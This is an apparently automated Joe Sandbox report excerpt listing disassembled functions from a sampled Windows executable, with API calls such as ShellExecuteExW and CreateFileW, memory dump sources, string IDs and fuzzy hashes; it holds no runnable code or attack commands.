                                        • Instruction Fuzzy Hash: C231C471145342BFE302DF21DC8AFAB7FACEB86704F004609F652961D0DB659A048B76

                                        APIs
                                        • _wcslen.LIBCMT ref: 002ED7AE
                                        • ShellExecuteExW.SHELL32(?), ref: 002ED8DE
                                        • ShowWindow.USER32(?,00000000), ref: 002ED91D
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 002ED959
                                        • CloseHandle.KERNEL32(?), ref: 002ED97F
                                        • ShowWindow.USER32(?,00000001), ref: 002ED9E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                        • String ID: .exe$.inf$PDu<.$h.$r.
                                        • API String ID: 36480843-1236758763
                                        • Opcode ID: 060d4ab2d0aff3c19ae474694c842fe7bda49fa423faf16578d916550df9e6b0
                                        • Instruction ID: 8caff47ee9084f3b7ac852260986a4a696c903b96179487033028c64ec94659e
                                        • Opcode Fuzzy Hash: 060d4ab2d0aff3c19ae474694c842fe7bda49fa423faf16578d916550df9e6b0
                                        • Instruction Fuzzy Hash: A75105700A43C19AEB31DF26DC40BABBBE8AF46744F84481EF9C597192D7708DA5CB52

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002F5695,002F5695,?,?,?,002FABAC,00000001,00000001,2DE85006), ref: 002FA9B5
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002FABAC,00000001,00000001,2DE85006,?,?,?), ref: 002FAA3B
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002FAB35
                                        • __freea.LIBCMT ref: 002FAB42
                                          • Part of subcall function 002F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
                                        • __freea.LIBCMT ref: 002FAB4B
                                        • __freea.LIBCMT ref: 002FAB70
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 6726a6e9d31a5444151a8e3ea2425e30c474d4e0dd862b3b2bc953acfbf2e784
                                        • Instruction ID: efa772ecfb0bf99d277dde5bd0f35cd9ce6176284cc4f9a26b8ab2265e35fe23
                                        • Opcode Fuzzy Hash: 6726a6e9d31a5444151a8e3ea2425e30c474d4e0dd862b3b2bc953acfbf2e784
                                        • Instruction Fuzzy Hash: CB51F5B263020AABDB258F64CD41EBBF7AAEB54794F154639FE08D6140DB70DC60CA51

                                        APIs
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,002F3C35,?,?,00332088,00000000,?,002F3D60,00000004,InitializeCriticalSectionEx,00306394,InitializeCriticalSectionEx,00000000), ref: 002F3C03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: api-ms-
                                        • API String ID: 3664257935-2084034818
                                        • Opcode ID: 745aa553be08cdd35d0cb80428a4efb76dfb08f732bcf86887ab1a3de3647404
                                        • Instruction ID: 09ce08ed42ef653b81efcfcac722325600b0cee190d01e211864e092fa63b7eb
                                        • Opcode Fuzzy Hash: 745aa553be08cdd35d0cb80428a4efb76dfb08f732bcf86887ab1a3de3647404
                                        • Instruction Fuzzy Hash: C911EB31A16229A7CB22CF68DC51B6DB79C9F017F4F150131EA11E7290D770EF1086D0

                                        APIs
                                          • Part of subcall function 002E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002E0836
                                          • Part of subcall function 002E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,002DF2D8,Crypt32.dll,00000000,002DF35C,?,?,002DF33E,?,?,?), ref: 002E0858
                                        • OleInitialize.OLE32(00000000), ref: 002EAC2F
                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002EAC66
                                        • SHGetMalloc.SHELL32(00318438), ref: 002EAC70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                        • String ID: riched20.dll$3Ro
                                        • API String ID: 3498096277-3613677438
                                        • Opcode ID: 9e754468e94e68ba72d09105b7ce3e89bdb7809e6647eedcc4c6f843896ee851
                                        • Instruction ID: 0e4d6385b4dbb6483bb059dcac95f180dd95ad387d5969e76ad0ed334c911793
                                        • Opcode Fuzzy Hash: 9e754468e94e68ba72d09105b7ce3e89bdb7809e6647eedcc4c6f843896ee851
                                        • Instruction Fuzzy Hash: 48F06DB1D00209ABCB11AFAAD8899EFFFFCEF84700F00401AE855E2241CBB456458FA1

                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,002D7760,?,00000005,?,00000011), ref: 002D995F
                                        • GetLastError.KERNEL32(?,?,002D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002D996C
                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,002D7760,?,00000005,?), ref: 002D99A2
                                        • GetLastError.KERNEL32(?,?,002D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002D99AA
                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,002D7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 002D99F9
                                        Similarity
                                        • API ID: File$CreateErrorLast$Time
                                        • String ID:
                                        • API String ID: 1999340476-0
                                        • Opcode ID: 8d24f70283d23d0bcceb183c0a31a484c022f757083503551786522148fe31ca
                                        • Instruction ID: 9cc2e98b07e72c2490b3b3efa359c51497c62d3e766221e031a6698848148ddd
                                        • Opcode Fuzzy Hash: 8d24f70283d23d0bcceb183c0a31a484c022f757083503551786522148fe31ca
                                        • Instruction Fuzzy Hash: C1312330555346AFE7309F24CC56BDABB98BB04320F200B1FF9A1962D0D3B4ADA4CB91

                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EB579
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EB58A
                                        • IsDialogMessageW.USER32(00010456,?), ref: 002EB59E
                                        • TranslateMessage.USER32(?), ref: 002EB5AC
                                        • DispatchMessageW.USER32(?), ref: 002EB5B6
                                        Similarity
                                        • API ID: Message$DialogDispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 1266772231-0
                                        • Opcode ID: 58146baa727313c8338089f5782d2cb44754f69cdb5348042086386d203fea2a
                                        • Instruction ID: e7264e92a4548f139c7e5cd6d093084f5d32c45cd20b7f85816d3ad2cb1400cd
                                        • Opcode Fuzzy Hash: 58146baa727313c8338089f5782d2cb44754f69cdb5348042086386d203fea2a
                                        • Instruction Fuzzy Hash: EFF0BD71A0115AAB8B25AFE69C8CDEB7FACEE05391B408415B916D2010EB34D605CBB0

                                        APIs
                                        • GetClassNameW.USER32(?,?,00000050), ref: 002EABC2
                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 002EABF9
                                          • Part of subcall function 002E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,002DC116,00000000,.exe,?,?,00000800,?,?,?,002E8E3C), ref: 002E1FD1
                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 002EABE9
                                        Strings
                                        Similarity
                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                        • String ID: EDIT
                                        • API String ID: 4243998846-3080729518
                                        • Opcode ID: da0f0a57338753e36437d7a6bdb690d3fd7eb6620748ea3d113ea3c37daaff8a
                                        • Instruction ID: 92257e53ad82fe573a9dd35fc5012ae2f7878432db2e5b605312e2d2f4768070
                                        • Opcode Fuzzy Hash: da0f0a57338753e36437d7a6bdb690d3fd7eb6620748ea3d113ea3c37daaff8a
                                        • Instruction Fuzzy Hash: 95F0273674122977DB215B269C49FDF72AC9F42B00F884025BA01F30C0D760EE5185F6

                                        APIs
                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 002EDBF4
                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002EDC30
                                        Strings
                                        Similarity
                                        • API ID: EnvironmentVariable
                                        • String ID: sfxcmd$sfxpar
                                        • API String ID: 1431749950-3493335439
                                        • Opcode ID: 8c39cfee41418fcaa4719fdadb5f7d92c2afaedba90a51e5a7f28a77bf7b823b
                                        • Instruction ID: 6b9bd51fa004bdf68f69496250ae6fca6573327d027f63211fd25eb2fe572919
                                        • Opcode Fuzzy Hash: 8c39cfee41418fcaa4719fdadb5f7d92c2afaedba90a51e5a7f28a77bf7b823b
                                        • Instruction Fuzzy Hash: 6BF0EC724A5265A7CF212F968C06BFB375CAF18BC1B540452FD8595191D6F08990DEB0

                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 002D9795
                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 002D97AD
                                        • GetLastError.KERNEL32 ref: 002D97DF
                                        • GetLastError.KERNEL32 ref: 002D97FE
                                        Similarity
                                        • API ID: ErrorLast$FileHandleRead
                                        • String ID:
                                        • API String ID: 2244327787-0
                                        • Opcode ID: 73bb26c0b19353f10557251e4228a2ab5b901a9278b406f5dd50ae24495e9792
                                        • Instruction ID: 6cca61ad8ddd1caf883f4a555b409b26c0e357036db72e8054e75e69f8066d69
                                        • Opcode Fuzzy Hash: 73bb26c0b19353f10557251e4228a2ab5b901a9278b406f5dd50ae24495e9792
                                        • Instruction Fuzzy Hash: D7118270930205EBEF215F65C80466977ADFB42721F20862BF817D5390D7749EE4EB61
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002F3F73,00000000,00000000,?,002FACDB,002F3F73,00000000,00000000,00000000,?,002FAED8,00000006,FlsSetValue), ref: 002FAD66
                                        • GetLastError.KERNEL32(?,002FACDB,002F3F73,00000000,00000000,00000000,?,002FAED8,00000006,FlsSetValue,00307970,FlsSetValue,00000000,00000364,?,002F98B7), ref: 002FAD72
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002FACDB,002F3F73,00000000,00000000,00000000,?,002FAED8,00000006,FlsSetValue,00307970,FlsSetValue,00000000), ref: 002FAD80
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 6653b9d05ba72e832417ed452f3dcfecd47c4be89c5ebd0fbde2cab4c5c98f8a
                                        • Instruction ID: df6f12cadfdad1fa31b69f6471cb8bdddbc883ffda3b2045076b4e7a6f531fd8
                                        • Opcode Fuzzy Hash: 6653b9d05ba72e832417ed452f3dcfecd47c4be89c5ebd0fbde2cab4c5c98f8a
                                        • Instruction Fuzzy Hash: E901F77663222BABC7224F68DC54AA7BB5CEF05BE2B110631FA0BD3551D720D91186E1
                                        APIs
                                          • Part of subcall function 002F97E5: GetLastError.KERNEL32(?,00311030,002F4674,00311030,?,?,002F3F73,00000050,?,00311030,00000200), ref: 002F97E9
                                          • Part of subcall function 002F97E5: _free.LIBCMT ref: 002F981C
                                          • Part of subcall function 002F97E5: SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F985D
                                          • Part of subcall function 002F97E5: _abort.LIBCMT ref: 002F9863
                                          • Part of subcall function 002FBB4E: _abort.LIBCMT ref: 002FBB80
                                          • Part of subcall function 002FBB4E: _free.LIBCMT ref: 002FBBB4
                                          • Part of subcall function 002FB7BB: GetOEMCP.KERNEL32(00000000,?,?,002FBA44,?), ref: 002FB7E6
                                        • _free.LIBCMT ref: 002FBA9F
                                        • _free.LIBCMT ref: 002FBAD5
                                        Strings
                                        Similarity
                                        • API ID: _free$ErrorLast_abort
                                        • String ID: p0
                                        • API String ID: 2991157371-140255176
                                        • Opcode ID: d234a4bda447189fc866f684d649744841b6d67c872f4b11c89a2ef1908a852e
                                        • Instruction ID: 276a75f69d770cb7a503573502fa0e082b8b615ffe40ed91b4b2695c90996ea5
                                        • Opcode Fuzzy Hash: d234a4bda447189fc866f684d649744841b6d67c872f4b11c89a2ef1908a852e
                                        • Instruction Fuzzy Hash: 1331C13191020DAFDB12EFA8C441BB9F7E5EF453A0F2140A9EA049B2A2EB325D50DF50
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: (.$PDu<.
                                        • API String ID: 1269201914-1205553035
                                        • Opcode ID: a8ce44cad0e8ab275b2689ab44956dc4323f91158c4adf9291e1e9d91d3709c0
                                        • Instruction ID: f9b4f9bbaa9997b3760455130b0f2b910223e109778425b2b594d2d298bdc1b4
                                        • Opcode Fuzzy Hash: a8ce44cad0e8ab275b2689ab44956dc4323f91158c4adf9291e1e9d91d3709c0
                                        • Instruction Fuzzy Hash: 49B012C52F94C07C7509920A1D12C3B050DC0C1F117F1D12EF405C40C0E8810C550831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE51F
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: 2.$PDu<.
                                        • API String ID: 1269201914-1655046575
                                        • Opcode ID: 1372a03f28ebce7edc397fc051f845204d7a7c971ebd385e67cbd716f3d8b604
                                        • Instruction ID: d110441f5418f5e94be9c10ac41799ee051fa55f35e489da2cdd4ebd77d06884
                                        • Opcode Fuzzy Hash: 1372a03f28ebce7edc397fc051f845204d7a7c971ebd385e67cbd716f3d8b604
                                        • Instruction Fuzzy Hash: 7AB012C52F95807D7509920A1D12D3B010DC0C1F117F1912EF405C40C0E8800C140831
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,002DD343,00000001,?,?,?,00000000,002E551D,?,?,?), ref: 002D9F9E
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,002E551D,?,?,?,?,?,002E4FC7,?), ref: 002D9FE5
                                        • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,002DD343,00000001,?,?), ref: 002DA011
                                        Similarity
                                        • API ID: FileWrite$Handle
                                        • String ID:
                                        • API String ID: 4209713984-0
                                        • Opcode ID: 8a83b48e63751074d958ef8d6df4d9683642f0442e27b7f535c1d7709b5f6c67
                                        • Instruction ID: 6687e7df3b799cab653dc5ff889255bae0f1886c437d3cada9d19f824759933b
                                        • Opcode Fuzzy Hash: 8a83b48e63751074d958ef8d6df4d9683642f0442e27b7f535c1d7709b5f6c67
                                        • Instruction Fuzzy Hash: E331F331218306AFDB15CF20D818BAE77A9FF84715F04491EF98297390C775AD98CBA2
                                        APIs
                                          • Part of subcall function 002DC27E: _wcslen.LIBCMT ref: 002DC284
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA2D9
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA30C
                                        • GetLastError.KERNEL32(?,?,?,?,002DA175,?,00000001,00000000,?,?), ref: 002DA329
                                        Similarity
                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                        • String ID:
                                        • API String ID: 2260680371-0
                                        APIs
                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 002FB8B8
                                        Similarity
                                        • API ID: Info
                                        • String ID:
                                        • API String ID: 1807457897-3916222277
                                        APIs
                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 002FAFDD
                                        Similarity
                                        • API ID: String
                                        • String ID: LCMapStringEx
                                        • API String ID: 2568140703-3893581201
                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,002FA56F), ref: 002FAF55
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpin
                                        • String ID: InitializeCriticalSectionEx
                                        • API String ID: 2593887523-3084827643
                                        APIs
                                        Similarity
                                        • API ID: Alloc
                                        • String ID: FlsAlloc
                                        • API String ID: 2773662609-671089009
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 605dd0376cef489926fd7952fe5f07b8e69239a86eb6c1ed5fb4c0543dba111a
                                        • Instruction ID: 4d9809aa7831b0e85523b2d2792a73d456e1c0d1a4a874d5152428b303f6ffba
                                        • Opcode Fuzzy Hash: 605dd0376cef489926fd7952fe5f07b8e69239a86eb6c1ed5fb4c0543dba111a
                                        • Instruction Fuzzy Hash: 52B012D92FD080AC3509A2171C12D3B014DC0C3B11371C13EFC09C40C0E980AC540831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 1d1a0a6042713cfce7684e911e9cc0f700030d781afb2b3628edaa549656dfb7
                                        • Instruction ID: 1d9a4b3246752adeb3b6cee6b4d7b4f02ca77d5d2044806d1259061e7ec1fd1e
                                        • Opcode Fuzzy Hash: 1d1a0a6042713cfce7684e911e9cc0f700030d781afb2b3628edaa549656dfb7
                                        • Instruction Fuzzy Hash: 43B012D92FA0C0AC3509A2071C12D3B014EC4C2B21771813EF80AC40C0E8806C540832
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 3374d828520d939d481a6ec5371379682cb8391bc4939e3f3f42ea9d22f4cbad
                                        • Instruction ID: a6af124afa7fe3064eeb2aaf702f4e88c31b9e4e7d59546f8502d6a5c516f45f
                                        • Opcode Fuzzy Hash: 3374d828520d939d481a6ec5371379682cb8391bc4939e3f3f42ea9d22f4cbad
                                        • Instruction Fuzzy Hash: D6B012D93FA0C0AC3509A2071C12D3B010EC0C3B21771C13EFC09C40C0E880AC540832
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 0c1322274d0de868f8b026933b797581038e0ed6223e840579428ad7c4fb92a7
                                        • Instruction ID: dc8ec8fab76e28fd117eb67307b81ee9bb46263f7a55cef03cd1a85ef5c2df03
                                        • Opcode Fuzzy Hash: 0c1322274d0de868f8b026933b797581038e0ed6223e840579428ad7c4fb92a7
                                        • Instruction Fuzzy Hash: ABB012E92FA1C0BC3549A3071C12D3B010EC0C2B22771823EF809C40C0E8C06C980832
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 002EE1E3
                                          • Part of subcall function 002EE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002EE8D0
                                          • Part of subcall function 002EE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002EE8E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: .
                                        • API String ID: 1269201914-1093786309
                                        • Opcode ID: 1348d56a52533d392922b6bde66b94eee6c7f7c9c309a842335be5ad405ca585
                                        • Instruction ID: 5cff5bd38a01c29613f99caffd58f20e3634ee66048e7f81cc8a7fd0cf4a92d0
                                        • Opcode Fuzzy Hash: 1348d56a52533d392922b6bde66b94eee6c7f7c9c309a842335be5ad405ca585
